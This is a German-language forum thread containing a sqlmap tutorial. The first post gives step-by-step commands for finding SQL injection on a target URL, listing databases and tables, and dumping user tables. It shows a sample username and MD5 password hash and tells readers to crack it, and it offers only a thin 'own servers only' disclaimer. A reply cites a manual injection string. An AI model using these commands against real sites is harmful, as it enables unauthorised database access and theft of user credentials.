Register for your free account! | Forgot your password?

You last visited: Today at 01:24

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



SQLmap Tutorial

Discussion on SQLmap Tutorial within the Coding Tutorials forum part of the General Coding category.

Reply
 
Old   #1
 
xbernx's Avatar
 
elite*gold: 72
Join Date: Apr 2015
Posts: 484
Received Thanks: 74
Arrow SQLmap Tutorial

SQLmap ist ein leistungsfähiges Werkzeug, um SQLi-Schwachstellen auszunutzen. Die grundlegende Verwendung ist
Code:
:~$ sqlmap -u "http://website.com/vulnerable?query=50" --db
Es gibt viele Optionen zum Anpassen von SQL Map:

Mit --user-agent= kann man einstellen, von welchem User-Agent die Anfragen kommen:
Code:
--user-agent = GoogleBOT
Oder eine zufällig generierte mit:
Code:
--random-agent
Ihr können auch die Anzahl der Threads festlegen, mit denen gearbeitet werden soll
Code:
--threads=5 (Standard ist 1)
Wenn das SQLi boolean-based ist, muss man die Abfrage möglicherweise noch eingehender prüfen, indem das Standardlevel und das Risiko von 1 bis 5 und 3 erhöhen. Dies ist zwar ungenauer, kann jedoch erforderlich sein.
Code:
--level=5
--risk=3
Ausserdem kann man noch DBMS erzwingen:
Code:
--dbms=mysql (oder postgresql/microsoft sql server/ etc)
Benutzen wir zunächst, was wir gelernt haben:
Code:
:~$ sqlmap -u "http://website.com/vulnerable?query=50" --threads=5 --level=5 --risk=3 --random-agent --dbms=mysql --keep-alive --dbs
Falls dies erfolgreich durchgeführt wurde, sollte man folgendes (oder ähnliches sehen):
Code:
available databases [2]:[*] information_schema[*] Main_DB (or whatever it's called)
Jetzt den Aufwärtspfeil drücken, um den vorherigen Befehl anzuzeigen. Ersetzt die Option --db durch -D NameDerTabelle und fügt --tables hinzu. Dadurch werden die Tabellen für diese Datenbank aufgelistet.

Jetzt kann man folgendes verwenden:
Code:
-D NameDerTabelle -T TabellenName --colums --dump
oder
Code:
-D NameDerTabelle -T Tabellenname -C ColumnName --dump
Folgendes kommt dabei dann heraus:
Code:
+----+---------------------------------------------+
| id | username | password
+----+---------------------------------------------+
| 1 | Anon | 5f4dcc3b5aa765d61d8327deb882cf99
+----+---------------------------------------------+
Jetzt muss man nur noch das Passwort cracken. In diesem Fall ist es MD5 und das Passwort ist "passwort". Wenn der Sysadmin faul ist, werden die Kennwörter manchmal im Klartext angezeigt.

Das Tutorial wird nur zum Testen an eigenen Geräten und Servern zur Verfügung gestellt. Gefunden auf Torum ohne Gewähr
xbernx is offline  
Old 12/05/2018, 21:10   #2
 
elite*gold: 100
Join Date: Apr 2008
Posts: 860
Received Thanks: 1,487
Ich hatte mit sqlmap bisher in den seltensten Fällen erfolg. Der hat nich mal die einfachsten Injections auszunutzen können. Aus ehemals einfachsten Lücken wurden brutal komplexe Queries die am Ende netma zuverlässige Ergebnisse geliefert haben. "Parameter x is not injectable" obwohl ich ihn per Hand mit " 'OR 1;--" easy exploiten konnte. Gibts da nen Trick?

Und wenns dann mal geht hält er sich unnötigerweise an den dümmsten Sachen auf. z.B. das er die Standard-DB Namen bei mysql, "mysql" und "information_schema", bruteforced, statt halbwegs intelligent zu raten. Tabellen und Spaltennamen kann man immerhin Wordlists angeben, aber das muss man auch erstma wissen.
florian0 is offline  
Reply

Tags
datenbank, hacken, sql, sql injection, sqlmap


Similar Threads Similar Threads
[Tutorial]Cracking Tutorial
10/22/2012 - Tutorials - 79 Replies
Hi, wollte ja wie einige wissen vor kurzem einen Hack cracken. Leider hat mir keiner so wirklich geholfen und Tutorials gabs auch nicht. Also hab ich mich selbst durchgewurschtelt und schreib jetzt mal für alle andern eins. Den gecrackten Hack lege ich nicht bei, um zu vermeiden das der von jeden Newbie hier benutz und in 2 Wochen detected sind. Sollte aber auch mit jedem anderen Hack und Spiel funktionieren. Ich möchte mich ausserdem dafür entschuldigen das die ollydbg bilder etwas...
[TUTORIAL] Starter friendly tutorial to searching for Nuke casting time [TUTORIAL]
02/09/2011 - 9Dragons - 12 Replies
If you already have Cheat Engine and know how to use it, skip to part 4 of the tutorial. 1. Introduction This forum has helped me quite a bit, so I decided to give something back :) Now I've noticed there are quite a few who ask for nuke casting time hacks / address', and I've also noticed, that there are quite a few who are REALLY annoyed with these questions, so I decided to write this so both sides can benefit from it. 2. Getting started First off, you need to have Cheat Engine...
[Tutorial+Tool] find other's hp mini tool + CE tutorial to find the Base Addresses
04/12/2010 - Archlord - 22 Replies
this thread contains a videos of how to find you hp and ur target's hp base address using cheat engine in Archlord, along with a mini-simple tool written in C# that uses this info to find ur hp and ur target's hp by reading the process memory also the source code (for whom ever wants to use it in his own bot possibly!) ---> finding base address isnt always easy, it has try-and-error, interacting with the client to gather more info using CE... the initial 1098 value of the target mob could be...
[Tutorial] Vac Hack Tutorial + Video
10/03/2008 - Dekaron Exploits, Hacks, Bots, Tools & Macros - 72 Replies
VIDEO I MADE JUST FOR NOOBS -->http://youtube.com/watch?v=4frYI7r3OLQ<- - HOW TO CREATE A VAC HACK FOR 2MOONS bigworm Must have 3 things: Monster editor, Winhex , and duh 2moons
Tutorial iXFS *Updater* Tutorial
06/16/2008 - General Gaming Discussion - 5 Replies
THIS IS A PROGRAM CREATED BY MOOSE GIVE HIM CREDIT! This is what you need to update .xfs files like for Avatar Hack ( Avatar.xfs ) and (Graphics.xfs) for 360 angle/0delay/unlimited walk/swear hack. Download attachment. Extract the iXFS.exe to your Desktop DOWNLOAD A HACK LIKE Avatar Hack OR 360 Angle/Unlimited Walk/0 Delay/Swear Hack AND SAVE THEM TO YOUR DESKTOP!!!!!!!



All times are GMT +1. The time now is 01:25.


Powered by vBulletin®
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2025 elitepvpers All Rights Reserved.